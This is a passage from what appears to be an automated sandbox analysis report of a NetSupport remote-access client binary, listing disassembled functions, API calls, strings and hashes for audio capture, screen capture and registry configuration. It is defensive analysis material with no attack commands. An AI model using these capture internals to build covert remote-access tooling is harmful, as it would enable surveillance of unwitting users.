                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$Select$EllipseInvalidateModeRectRectangleReleaseStock
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                    • API String ID: 3817751823-2830328467
                                                                                                                                    • Opcode ID: 31dbc78ca4f912d513ff3d60aa557508b04549e6c455e6073b42d84193fa9df6
                                                                                                                                    • Instruction ID: 8bc0c1d71194831c9c3e3390832995cb6dea655f6629d54d7b96bb98d6414c8b
                                                                                                                                    • Opcode Fuzzy Hash: 31dbc78ca4f912d513ff3d60aa557508b04549e6c455e6073b42d84193fa9df6
                                                                                                                                    • Instruction Fuzzy Hash: 94A140B4A007059BE718CF69CC94AEBB7EAEF88344F20896DE55AD3744DB74A840CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1100B440 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 190fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,20F29797,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
                                                                                                                                    • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
                                                                                                                                    • LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
                                                                                                                                      • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                                      • Part of subcall function 1100AD10: EnterCriticalSection.KERNEL32(000000FF,20F29797,?,00000000,00000000), ref: 1100AD54
                                                                                                                                      • Part of subcall function 1100AD10: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AD72
                                                                                                                                      • Part of subcall function 1100AD10: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ADBE
                                                                                                                                      • Part of subcall function 1100AD10: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AE05
                                                                                                                                      • Part of subcall function 1100AD10: CloseHandle.KERNEL32(00000000), ref: 1100AE0C
                                                                                                                                      • Part of subcall function 1100AD10: FreeLibrary.KERNEL32(?), ref: 1100AE3B
                                                                                                                                      • Part of subcall function 1100AD10: LeaveCriticalSection.KERNEL32(?), ref: 1100AE45
                                                                                                                                    • LeaveCriticalSection.KERNEL32(1100CB7A,?,?,1100CB7A,?), ref: 1100B59E
                                                                                                                                    Strings
                                                                                                                                    • Audio, xrefs: 1100B477
                                                                                                                                    • InitCaptureSounds NT6, xrefs: 1100B5BE
                                                                                                                                    • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B5F3
                                                                                                                                    • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B64C
                                                                                                                                    • Vista new pAudioCap=%p, xrefs: 1100B603
                                                                                                                                    • DisableSounds, xrefs: 1100B472
                                                                                                                                    • \\.\NSAudioFilter, xrefs: 1100B4E0
                                                                                                                                    • Vista AddAudioCapEvtListener(%p), xrefs: 1100B623
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc
                                                                                                                                    • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                                                                    • API String ID: 2109388920-2362500394
                                                                                                                                    • Opcode ID: 1fe7b9b6c0f710ae84cdce54030855f788110a3df0201f205448bfee00d84397
                                                                                                                                    • Instruction ID: 79732c4921e51442e8b050610a6755ede2f12e6e97fc197f43339bcf40ac1e73
                                                                                                                                    • Opcode Fuzzy Hash: 1fe7b9b6c0f710ae84cdce54030855f788110a3df0201f205448bfee00d84397
                                                                                                                                    • Instruction Fuzzy Hash: A25129B5E44A4AEFE704CF64DC80B9AF7A4FB05359F10467AE92993240E7317550CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1111D660 Relevance: 22.7, APIs: 15, Instructions: 153windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1111D6BE
                                                                                                                                    • CreateRectRgn.GDI32(?,?,?,?), ref: 1111D6E6
                                                                                                                                    • CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 1111D6F7
                                                                                                                                    • DeleteObject.GDI32(?), ref: 1111D701
                                                                                                                                    • CreateRectRgn.GDI32(00000000,00000000,?,?), ref: 1111D735
                                                                                                                                    • CombineRgn.GDI32(00000000,00000000,00000000,00000004), ref: 1111D742
                                                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 1111D759
                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00000042), ref: 1111D783
                                                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 1111D792
                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00000042), ref: 1111D7BC
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 1111D7D1
                                                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 1111D7E5
                                                                                                                                    • OffsetRgn.GDI32(00000000,?,?), ref: 1111D7FA
                                                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 1111D808
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 1111D80F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClipSelect$CreateDeleteObjectRect$Combine$Offset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3866515003-0
                                                                                                                                    • Opcode ID: fe86cac12546267f09bc71288f12fb1549db4e569b286baddfec6e8ac96b87dc
                                                                                                                                    • Instruction ID: 84ddac36778523c77c7e55966e0e7ea944c2670e4efe0413cf235aa62501f106
                                                                                                                                    • Opcode Fuzzy Hash: fe86cac12546267f09bc71288f12fb1549db4e569b286baddfec6e8ac96b87dc
                                                                                                                                    • Instruction Fuzzy Hash: 2C5143B5740615BFEB089BB0DD89FAAF7ACFB48309F004169F92996644D774BC40CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1111C2B0 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 201windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 1111C3AB
                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 1111C3DA
                                                                                                                                    • SetDIBits.GDI32(?,00000000,00000000,?,?,00000000,00000001), ref: 1111C489
                                                                                                                                      • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                      • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                    • SelectObject.GDI32 ref: 1111C4B9
                                                                                                                                    • BitBlt.GDI32(?,00000000,?,?,?,00000000,00000000,00000000,00CC0020), ref: 1111C4DD
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1111C4E8
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 1111C4EB
                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 1111C4F2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$CompatibleCreateDeleteSelect$BitmapBitsErrorFreeHeapLast
                                                                                                                                    • String ID: ..\ctl32\Remote.cpp$hbm$hdc$idata->dos_DIB
                                                                                                                                    • API String ID: 13826107-1017213458
                                                                                                                                    • Opcode ID: fda340b28dc9344976d7d4f42bbcfcbb12922b7fb03d72ab66ab4dbf3ecdbbb0
                                                                                                                                    • Instruction ID: 851ec34c5862c62c2e758830a3d7d1fdd53aad81baf56595c0133d6a7da64e41
                                                                                                                                    • Opcode Fuzzy Hash: fda340b28dc9344976d7d4f42bbcfcbb12922b7fb03d72ab66ab4dbf3ecdbbb0
                                                                                                                                    • Instruction Fuzzy Hash: 1161BFB9A04616ABD714CFB1DD40BBBF7B8BF48608F004529F9599B684E730FA00C7A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1105F200 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 368COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • wsprintfA.USER32 ref: 1105F251
                                                                                                                                    • wsprintfA.USER32 ref: 1105F265
                                                                                                                                      • Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000,?,00000000,762DC740,?,?,1105F29C,80000001), ref: 110ED59B
                                                                                                                                      • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                                                                    • wsprintfA.USER32 ref: 1105F5D6
                                                                                                                                      • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32 ref: 110ED1CB
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen
                                                                                                                                    • String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                    • API String ID: 3501202665-33395967
                                                                                                                                    • Opcode ID: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
                                                                                                                                    • Instruction ID: 955d7069f5cd37ed2049fe2a08fe06563fb7c7f4ee9c814884e1c508eb43a074
                                                                                                                                    • Opcode Fuzzy Hash: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
                                                                                                                                    • Instruction Fuzzy Hash: D2E16079E0122DABDB56DB55CC94FEDB7B8AF58758F4040C8E50977280EA306B84CF61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1100D330 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: wsprintf
                                                                                                                                    • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                                                                    • API String ID: 2111968516-2092292787
                                                                                                                                    • Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                                                                    • Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
                                                                                                                                    • Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                                                                    • Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1110F3F0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 218fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(0000017D,20F29797,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
                                                                                                                                    • WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE
                                                                                                                                      • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1118B168,000000FF), ref: 1110F5F5
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F665
                                                                                                                                    • timeEndPeriod.WINMM(00000001), ref: 1110F677
                                                                                                                                    • LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,20F29797,0000017D,00000001), ref: 1110F681
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriodtime
                                                                                                                                    • String ID: End Record %s$PCIR
                                                                                                                                    • API String ID: 3323594205-2672865668
                                                                                                                                    • Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                                                                    • Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
                                                                                                                                    • Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                                                                    • Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11016500 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 154windowtimethreadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetWindowRect.USER32 ref: 1101653C
                                                                                                                                    • IsWindowVisible.USER32 ref: 11016549
                                                                                                                                    • GetWindow.USER32(?,00000004), ref: 11016556
                                                                                                                                    • IsWindowVisible.USER32 ref: 11016561
                                                                                                                                    • GetClassNameA.USER32(?,?,00000020), ref: 11016576
                                                                                                                                    • SendMessageTimeoutA.USER32(?,0000000D,000000C8,?,00000002,00000064,?), ref: 110165DF
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 11016604
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 1101665F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Visible$ClassDeleteMessageNameObjectProcessRectSendThreadTimeout
                                                                                                                                    • String ID: NSMWControl32$NSSWControl32$Progman
                                                                                                                                    • API String ID: 3572104470-975155618
                                                                                                                                    • Opcode ID: 190115a1186469cf8095dd0937271066082da112a666e0afcd09eae1c7bd6ff0
                                                                                                                                    • Instruction ID: e961a916bbbcfe8b57c7ffd2e482cea40bc41dda2ab4819b6da64e7ff7338971
                                                                                                                                    • Opcode Fuzzy Hash: 190115a1186469cf8095dd0937271066082da112a666e0afcd09eae1c7bd6ff0
                                                                                                                                    • Instruction Fuzzy Hash: AE514175D102299FDB54DF64CC84BEDB7B4BF49304F0041A9E519E7284EB74AA84CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110762B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 153COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
